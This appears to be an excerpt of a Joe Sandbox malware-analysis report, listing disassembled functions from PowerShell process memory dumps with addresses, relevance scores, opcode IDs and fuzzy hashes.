                                  • Instruction Fuzzy Hash: D0F1B33190CA8E8FEBA8EF28C8557E937D1FF54350F14426EE84DC7695DB38A8418B81
                                  Function 00007FF848BDBEB2 Relevance: 3.0, Strings: 2, Instructions: 466COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2203679900.00007FF848BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848BD0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7ff848bd0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: $Z$$Z
                                  • API String ID: 0-2706988786
                                  • Opcode ID: 7622f97b5fcfb2de560b62e9ed6bc048ffba4f0e978d1cb49b585383194b6ede
                                  • Instruction ID: a96d253d2352cde37a7b02030924459dcdf59890e0eda82f9b749c4e84daf28a
                                  • Opcode Fuzzy Hash: 7622f97b5fcfb2de560b62e9ed6bc048ffba4f0e978d1cb49b585383194b6ede
                                  • Instruction Fuzzy Hash: 85F1C03090CA8E8FEBA9EF28C8557E977D1EF54350F14426EE84DC7691DF78A8418B81
                                  Function 00007FF848BD5950 Relevance: 2.9, Strings: 2, Instructions: 385COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2203679900.00007FF848BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848BD0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7ff848bd0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 0kH$PmH
                                  • API String ID: 0-3858910588
                                  • Opcode ID: 25d467517979cbc8cc540a500e42425e2757d4a76a55a91e2240d42864376184
                                  • Instruction ID: e811cc66ed6fe958cba9f58fbec298d17ab874741ba48a71ec8cc37fb7d9b0c2
                                  • Opcode Fuzzy Hash: 25d467517979cbc8cc540a500e42425e2757d4a76a55a91e2240d42864376184
                                  • Instruction Fuzzy Hash: 45C17C30A1894E8FDF98EF5CC485AE977E1FF68350F14416AD409D7296DB34E882CB80
                                  Function 00007FF848BDBAC6 Relevance: 2.8, Strings: 2, Instructions: 329COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2203679900.00007FF848BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848BD0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7ff848bd0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: $Z$$Z
                                  • API String ID: 0-2706988786
                                  • Opcode ID: 6f08dbfc5dcc5d33c3a7cf002ad3de5de69d57ffb5051ded244ca3a4ae08c872
                                  • Instruction ID: 825538b0bf7b7a155c2fbc18a89ddeba4b4b815b34ced24ae9e88999a1b1280f
                                  • Opcode Fuzzy Hash: 6f08dbfc5dcc5d33c3a7cf002ad3de5de69d57ffb5051ded244ca3a4ae08c872
                                  • Instruction Fuzzy Hash: E9B1C23090CA8D8FEBA8EF28D8557E93BD1FF55350F04426EE84DC7692DB3498458B86
                                  Function 00007FF848CAA233 Relevance: 2.6, Strings: 2, Instructions: 148COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2204687924.00007FF848CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848CA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7ff848ca0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: h"H$h"H
                                  • API String ID: 0-717975129
                                  • Opcode ID: 9209e25316e2c25916cf4939886f8edd76ccee9cfed211df1a8a646f7e9f2df6
                                  • Instruction ID: 1324cbc72e6b45617f2a5c0d5d85017f5ba4445e2016533a3b614f2a0661c3d8
                                  • Opcode Fuzzy Hash: 9209e25316e2c25916cf4939886f8edd76ccee9cfed211df1a8a646f7e9f2df6
                                  • Instruction Fuzzy Hash: CF41F332A0DB898FEBE5EB289841AB97BE1EF55350F0801BBC40DC7193DE19A848C355
                                  Function 00007FF848BDD925 Relevance: .7, Instructions: 722COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2203679900.00007FF848BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848BD0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7ff848bd0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 0d87c7fa6685b2fd95693a5ebc5acbf8491d637b8ab1c4f2c9827ac0cf896d14
                                  • Instruction ID: 0f2ad00b0b1ca3aa55f222357227dcf635699923790fea9bf525b50994fd212b
                                  • Opcode Fuzzy Hash: 0d87c7fa6685b2fd95693a5ebc5acbf8491d637b8ab1c4f2c9827ac0cf896d14
                                  • Instruction Fuzzy Hash: 69F18E30A1CA4D9FDF98EF1CC495AA97BE1FFA8340F14016AE449D7295CB34E881CB85
                                  Function 00007FF848CAACEF Relevance: .5, Instructions: 459COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2204687924.00007FF848CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848CA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7ff848ca0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 3042c8c361a6bdfa0330aa9841cb59c5c92e7dae4254deb5a18f1268c7220fc5
                                  • Instruction ID: 1184648a05fc35829b1b87aeb068716418f88d02a058860f208d7dcc3183287b
                                  • Opcode Fuzzy Hash: 3042c8c361a6bdfa0330aa9841cb59c5c92e7dae4254deb5a18f1268c7220fc5
                                  • Instruction Fuzzy Hash: 0CE10432E0EB855FE799EB2898552B9BBE2EF55650F0801BEC04CC71D3DE28AC458356
                                  Function 00007FF848CAA503 Relevance: .5, Instructions: 454COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2204687924.00007FF848CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848CA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7ff848ca0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 31d4c256e2f7d39903d7dca0403d7b1484909cb1474f8a358cd3e18c4e3f0fd2
                                  • Instruction ID: cae4e4ed1a405496f2e2b0843f05a211f7b8b1fa825621fedf1285a3219e9331
                                  • Opcode Fuzzy Hash: 31d4c256e2f7d39903d7dca0403d7b1484909cb1474f8a358cd3e18c4e3f0fd2
                                  • Instruction Fuzzy Hash: 66E11432E0DB865FE799EB2898552B977E2EF55660F0801BEC00DC71C3DE29AC858746
                                  Function 00007FF848CA566D Relevance: .4, Instructions: 354COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2204687924.00007FF848CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848CA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7ff848ca0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 1a4dd65416550904e60f9c840e64254e15b684f2b615f174994e75840b0199ae
                                  • Instruction ID: 15438a0cd76f20178384c808af56ee956a950a2fce53f4dfc878e17ab9853a71
                                  • Opcode Fuzzy Hash: 1a4dd65416550904e60f9c840e64254e15b684f2b615f174994e75840b0199ae
                                  • Instruction Fuzzy Hash: 31B14432E1EB8A4FE7D5EBAC98556B97BE0EF562A0F0841FAC00DC71D3DA189C058355
                                  Function 00007FF848CA472B Relevance: .3, Instructions: 315COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2204687924.00007FF848CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848CA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7ff848ca0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 51666dbde8f7d93045044a33048b4aebf15db6b6c65053094d03933046130bcb
                                  • Instruction ID: fd310d3b331c73bc0d9d1686e905b92d01607176f547670d51b00a3029f01f64
                                  • Opcode Fuzzy Hash: 51666dbde8f7d93045044a33048b4aebf15db6b6c65053094d03933046130bcb
                                  • Instruction Fuzzy Hash: EA91F431E1EB8A4FE7D9EB2C68562B976D1EF457A0F44017ED40DC3993EE18AC11824A
                                  Function 00007FF848CA7CC1 Relevance: .3, Instructions: 260COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2204687924.00007FF848CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848CA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7ff848ca0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 7870ba4ae692e897e9af2888dec6fc83352b31d3a8f11b6122aba7f26650f16c
                                  • Instruction ID: cde69b2b9dcb81cb36fda0bb27eeb5944d139c5963c1aec1f2292ae70f29bb5d
                                  • Opcode Fuzzy Hash: 7870ba4ae692e897e9af2888dec6fc83352b31d3a8f11b6122aba7f26650f16c
                                  • Instruction Fuzzy Hash: 7C71E632E4EB895FE796E62868556B57BE1EF42254F0800FBD08DC70A3EE196C068356
                                  Function 00007FF848CAAA31 Relevance: .2, Instructions: 157COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2204687924.00007FF848CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848CA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7ff848ca0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 7c344b526234058ceefd08377788474415c761fc56d4041d682607984d3b2f64
                                  • Instruction ID: 3a599f5e95fe815b102003bdaeb160afdad06b0360277794dd4ef863d37d7f88
                                  • Opcode Fuzzy Hash: 7c344b526234058ceefd08377788474415c761fc56d4041d682607984d3b2f64
                                  • Instruction Fuzzy Hash: DA412632A0DB894FEBD6EB2898516B97BE1EF56350F0800FBC44DC7193DA18AC49C756
                                  Function 00007FF848CA5792 Relevance: .1, Instructions: 108COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2204687924.00007FF848CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848CA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7ff848ca0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: eb12c8c8cc0c88770d259f483a376b9433de603af7b0894a687007990499aa03
                                  • Instruction ID: a43f072498ec5fbf85e33c8551c4177ec98075cc07f8eb6c3eb9a8c4980480e6
                                  • Opcode Fuzzy Hash: eb12c8c8cc0c88770d259f483a376b9433de603af7b0894a687007990499aa03
                                  • Instruction Fuzzy Hash: 4331F422D2FB874FF3E9E6A868152B86AE0EF456D0F4841BAD41DD31D3DE085C044359
                                  Function 00007FF848CA4854 Relevance: .1, Instructions: 97COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2204687924.00007FF848CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848CA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7ff848ca0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 1b26611f10300ee87193358b42ead8f19446dd4783e03a25720fd7bcb63999f4
                                  • Instruction ID: 7b14a6a83c2ba414943bee245e4cfaf3a541b0e3cf60b0bc7f417cd97b915b76
                                  • Opcode Fuzzy Hash: 1b26611f10300ee87193358b42ead8f19446dd4783e03a25720fd7bcb63999f4
                                  • Instruction Fuzzy Hash: 8521F821E1EB864FF3D9F72C644527566D2EF412A1F4901B9D10DC79D3EF19AC458309
                                  Function 00007FF848BDB5C4 Relevance: .1, Instructions: 92COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2203679900.00007FF848BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848BD0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7ff848bd0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d9841ea779b8bd3684fbead9f78944611629f9ff437c6af15065ef9c91e54d6d
                                  • Instruction ID: 236d7b0be52460f1fd307c73a68e2453d783884898cb46185cb5bc167f69f818
                                  • Opcode Fuzzy Hash: d9841ea779b8bd3684fbead9f78944611629f9ff437c6af15065ef9c91e54d6d
                                  • Instruction Fuzzy Hash: 5731F33081D68EAEFBB8AF15CC0ABF972E0FB46359F404139D40E86592CB786985CF15
                                  Function 00007FF848CA189F Relevance: .1, Instructions: 79COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2204687924.00007FF848CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848CA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7ff848ca0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: df5222ce1d83bee1faf7a251ce4de2f88cac4d2aad366fc0beadbd176ee9c177
                                  • Instruction ID: a9a0b972dc97926d6657a8e91b2279ff6023b68ce8bcca86cb1965a6459426a3
                                  • Opcode Fuzzy Hash: df5222ce1d83bee1faf7a251ce4de2f88cac4d2aad366fc0beadbd176ee9c177
                                  • Instruction Fuzzy Hash: F521B022E0EBC65FF395A63C28591786AE1EF566A0F0901FBC049CB1D3DD0C5849832A
                                  Function 00007FF848CA9B7D Relevance: .1, Instructions: 71COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2204687924.00007FF848CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848CA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7ff848ca0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 949349dd5e7546057f43d9c799316b721036ce44e191e71955fa1cf6d3353571
                                  • Instruction ID: 1a32ed6c70974e25b7d3908d4a9bde0109c9a2d8adb30827418e2a84dc1faae2
                                  • Opcode Fuzzy Hash: 949349dd5e7546057f43d9c799316b721036ce44e191e71955fa1cf6d3353571
                                  • Instruction Fuzzy Hash: CA21A421E0E7854FE75AE7686C522E8B7A1FF46250F0401FAD05D871C3DE2868488745
                                  Function 00007FF848CA972B Relevance: .1, Instructions: 51COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2204687924.00007FF848CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848CA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7ff848ca0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b85faad778aa42e81705c22ec5c24c19ac6ff5c39dd712d1a8ad78f7e54fcb78
                                  • Instruction ID: 9585ec2120df8d447248611ccacf956105d87cfabdafc465b29b99fadde7a573
                                  • Opcode Fuzzy Hash: b85faad778aa42e81705c22ec5c24c19ac6ff5c39dd712d1a8ad78f7e54fcb78
                                  • Instruction Fuzzy Hash: 1701F721A0EFC55FE79AEB6898929657BE0EF1675070800EAC04DCB1C3C9089C48C3A1
                                  Function 00007FF848BD3945 Relevance: .0, Instructions: 49COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2203679900.00007FF848BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848BD0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7ff848bd0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 0d5f8bd4930a63cdbcd6f9a23957c342ff1d62f78ef99ce6612c7dcee371064b
                                  • Instruction ID: 789280c2397dc49948436df067cab381d49f99f6f2b7a8b630790011de137695
                                  • Opcode Fuzzy Hash: 0d5f8bd4930a63cdbcd6f9a23957c342ff1d62f78ef99ce6612c7dcee371064b
                                  • Instruction Fuzzy Hash: 3401677111CB0C4FDB44EF0CE451AA5B7E0FB99364F10056DE58AC3691DB36E892CB45
                                  Function 00007FF848CA974A Relevance: .0, Instructions: 45COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2204687924.00007FF848CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848CA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7ff848ca0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 9b18d3c51d5a8c770926a481bdfeebb71efcf1d6aac75350895b2131b37d375c
                                  • Instruction ID: e2ffea7847b0bc2a09608227d64ba0e417431b359a1038783d5b22df42e907fa
                                  • Opcode Fuzzy Hash: 9b18d3c51d5a8c770926a481bdfeebb71efcf1d6aac75350895b2131b37d375c
                                  • Instruction Fuzzy Hash: 78F0A921E0DB855FEBD5EA6C988257477D0EF15750B0804FAD01DC71D3DE18AC558365
                                  Function 00007FF848CA794A Relevance: .0, Instructions: 37COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2204687924.00007FF848CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848CA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7ff848ca0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 018932e434c182ead397dfacf66fc2a01728c66f468ba0d2045470a94d6d52c4
                                  • Instruction ID: 6c986c4e212d7e6753abf0ea7903a56eca0bab544ae8f7a6dfa507b2572bb15d
                                  • Opcode Fuzzy Hash: 018932e434c182ead397dfacf66fc2a01728c66f468ba0d2045470a94d6d52c4
                                  • Instruction Fuzzy Hash: 7BF0E533A5DA0C4EE385E62C64052F9B3D2EFC8171F550277C14ED3156EF25D85A4244
                                  Function 00007FF848CA7D01 Relevance: .0, Instructions: 35COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2204687924.00007FF848CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848CA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7ff848ca0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 15155013172490c00facc4c66896a05c4aab742b01e28929c4c211dd098ef66a
                                  • Instruction ID: 019a2edfd87f07f803110ad436312c94f8637c4d252477f71d22d0b6b8b30cda
                                  • Opcode Fuzzy Hash: 15155013172490c00facc4c66896a05c4aab742b01e28929c4c211dd098ef66a
                                  • Instruction Fuzzy Hash: 49E09B32F6EB090EFBDDA51D78122F9A3D1EF85161B54147FC14FC2483EE16AC164249

                                  Executed Functions

                                  Function 0456EDF0 Relevance: .3, Instructions: 281COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.3326066620.0000000004560000.00000040.00000800.00020000.00000000.sdmp, Offset: 04560000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_4560000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: cbaac8c0bc081b644fde0725e4b38eee8c16f566ef6d5637156d3421d4787cd4
                                  • Instruction ID: 9919bdec62d79a9b3ecc1fd5430ed99900771f2da6714c975c136a71ae5f30be
                                  • Opcode Fuzzy Hash: cbaac8c0bc081b644fde0725e4b38eee8c16f566ef6d5637156d3421d4787cd4
                                  • Instruction Fuzzy Hash: B2B15171E00209DFDF10CFA9E98579EBBF2BF88314F148529E416A7294EB74A845DF81
                                  Function 0456F6C0 Relevance: .3, Instructions: 266COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.3326066620.0000000004560000.00000040.00000800.00020000.00000000.sdmp, Offset: 04560000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_4560000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: ad38b72e316e01f0907669982287dae6f60a5ff18f53ac8aadc08070ea694973
                                  • Instruction ID: 91acc7fbfc82bdff2caee4beb3d39accbb5f20f5ff1bd0c6e360ce5ce7871780
                                  • Opcode Fuzzy Hash: ad38b72e316e01f0907669982287dae6f60a5ff18f53ac8aadc08070ea694973
                                  • Instruction Fuzzy Hash: A3B16472E00209DFDF14CFA9E98179DBBF2BF88314F148529D41AE7254EB74A845DB81
                                  Function 072884A8 Relevance: 23.2, Strings: 18, Instructions: 686COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.3348346393.0000000007280000.00000040.00000800.00020000.00000000.sdmp, Offset: 07280000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_7280000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 4']q$4']q$4']q$4']q$4']q$4']q$tP]q$tP]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q
                                  • API String ID: 0-1355183119
                                  • Opcode ID: b12a0567896a478a4ed27773506b58bfbdd0e447f83def86b84b14972c01766d
                                  • Instruction ID: a6d83b606961611d91508582cfd62c82f701bb6f208a7dea6e9cdaf57c6b1d5c
                                  • Opcode Fuzzy Hash: b12a0567896a478a4ed27773506b58bfbdd0e447f83def86b84b14972c01766d
                                  • Instruction Fuzzy Hash: 6B3258B1B31207CFCB68AF78845066ABBE2AF85311F94847AD945CB2D5DB37C841C7A1
                                  Function 07282C28 Relevance: 15.5, Strings: 12, Instructions: 453COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.3348346393.0000000007280000.00000040.00000800.00020000.00000000.sdmp, Offset: 07280000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_7280000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 4']q$4']q$4']q$4']q$4']q$4']q$$]q$$]q$$]q$$]q$$]q$$]q
                                  • API String ID: 0-78369665
                                  • Opcode ID: 134a9ad0d9c320dbd3f813410c3399e7ab268b72efa0bc08fe5da344144f8ac4
                                  • Instruction ID: aa3d5d8c75ed6f29895cef7a188615bacd35ba0cd5a106c83563f9c475cb9139
                                  • Opcode Fuzzy Hash: 134a9ad0d9c320dbd3f813410c3399e7ab268b72efa0bc08fe5da344144f8ac4
                                  • Instruction Fuzzy Hash: 72E158B1725247CFCB69EF28C4502AABBE2FF85611F1484ABD845CB2D6DB36C841C761
                                  Function 07286BB8 Relevance: 8.2, Strings: 6, Instructions: 655COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.3348346393.0000000007280000.00000040.00000800.00020000.00000000.sdmp, Offset: 07280000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_7280000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 4']q$4']q$4']q$4']q$4']q$4']q
                                  • API String ID: 0-471056614
                                  • Opcode ID: b8a4d8d3e618527a5c531d1a260b23c186bc7f87427a0e0651ef11a43c6c064b
                                  • Instruction ID: c4255fd09de6e141c6ab83ffb83dfee2d3db3da98535ca615d81082c183978c8
                                  • Opcode Fuzzy Hash: b8a4d8d3e618527a5c531d1a260b23c186bc7f87427a0e0651ef11a43c6c064b
                                  • Instruction Fuzzy Hash: 4942B2B0A21219CFD764DF98C954B69BBB2FF85304F2085A9D505AB395CB32EC81CF91
                                  Function 07287EC8 Relevance: 7.8, Strings: 6, Instructions: 339COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.3348346393.0000000007280000.00000040.00000800.00020000.00000000.sdmp, Offset: 07280000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_7280000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 4']q$4']q$4']q$4']q$4']q$4']q
                                  • API String ID: 0-471056614
                                  • Opcode ID: 362d98bc030943b96713652a7f1e68f04a7ea9c0459a2e11ffa74877af727115
                                  • Instruction ID: 18e7e6555cfd8ab7cf77e76839a058986e89cf84422114a2c197fb79a39103a1
                                  • Opcode Fuzzy Hash: 362d98bc030943b96713652a7f1e68f04a7ea9c0459a2e11ffa74877af727115
                                  • Instruction Fuzzy Hash: E1D1C0B0A21205CFDB58EB68C550B9EBBA3EF84704F60C525D9016F395CB76EC45CB91
                                  Function 0728A5C8 Relevance: 5.6, Strings: 4, Instructions: 567COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.3348346393.0000000007280000.00000040.00000800.00020000.00000000.sdmp, Offset: 07280000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_7280000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 4']q$4']q$4']q$4']q
                                  • API String ID: 0-1785108022
                                  • Opcode ID: 6f934ea1626a5c5601799fd56f3eed69b90613e33ed4cf630d41491a1c234c73
                                  • Instruction ID: 50884025bd256d201f3a1ad6bf32cfddbd7d539e5c31628fe59111c451588560
                                  • Opcode Fuzzy Hash: 6f934ea1626a5c5601799fd56f3eed69b90613e33ed4cf630d41491a1c234c73
                                  • Instruction Fuzzy Hash: 891279B1B252428FCB65AB78881176A7FB2AFC1311F14C4ABC545DF2D2DE36C852C7A1
                                  Function 0456B700 Relevance: 4.2, Strings: 3, Instructions: 456COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.3326066620.0000000004560000.00000040.00000800.00020000.00000000.sdmp, Offset: 04560000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_4560000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: Haq$$]q$$]q
                                  • API String ID: 0-1533201563
                                  • Opcode ID: ef1daa71f314d75d993d543a6afe2930c987cb3b295c7e0d42417adba8610199
                                  • Instruction ID: eb8a16d1d241ed80b1256fd2cbbb98e4fe77e191d22938a0b51e5c6f46e49491
                                  • Opcode Fuzzy Hash: ef1daa71f314d75d993d543a6afe2930c987cb3b295c7e0d42417adba8610199
                                  • Instruction Fuzzy Hash: E8121E34B001288FDB25DB64D8547AEB7B6BF89704F1484A9D40AAB361DF35AE81DF80
                                  Function 07288DB8 Relevance: 4.0, Strings: 3, Instructions: 285COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.3348346393.0000000007280000.00000040.00000800.00020000.00000000.sdmp, Offset: 07280000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_7280000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 4']q$4']q$$]q
                                  • API String ID: 0-1444653880
                                  • Opcode ID: e4a966c83f9fc7c788d464753d45facc9084a2637b5f0642df936ca11c1a0f3c
                                  • Instruction ID: 356a2413ae162f601e86dd2a9e09e9ae8d7b954362cb9ffb0a1094305e06b928
                                  • Opcode Fuzzy Hash: e4a966c83f9fc7c788d464753d45facc9084a2637b5f0642df936ca11c1a0f3c
                                  • Instruction Fuzzy Hash: 58A169B0B353468FDB65AB78881076A7BE29F92204F5484A6D541CF2E2DB37D844C7A1
                                  Function 07287EAA Relevance: 4.0, Strings: 3, Instructions: 266COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.3348346393.0000000007280000.00000040.00000800.00020000.00000000.sdmp, Offset: 07280000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_7280000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 4']q$4']q$4']q
                                  • API String ID: 0-705557208
                                  • Opcode ID: 2366fb9c36edf6a5f80593b88feea6d6976a9e90b31c898efa81d173187ef7d4
                                  • Instruction ID: 9f212e910d22f06ff81da6489c7e1ecf5ad2537001015dc6f5c9cc5a6e812d1a
                                  • Opcode Fuzzy Hash: 2366fb9c36edf6a5f80593b88feea6d6976a9e90b31c898efa81d173187ef7d4
                                  • Instruction Fuzzy Hash: 20B1DFB0A21205CFDB54EF64C541B9EBBB2EF88708F60C555E8016F395CB76E885CB91
                                  Function 07280A80 Relevance: 3.9, Strings: 3, Instructions: 124COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.3348346393.0000000007280000.00000040.00000800.00020000.00000000.sdmp, Offset: 07280000, based on PE: false
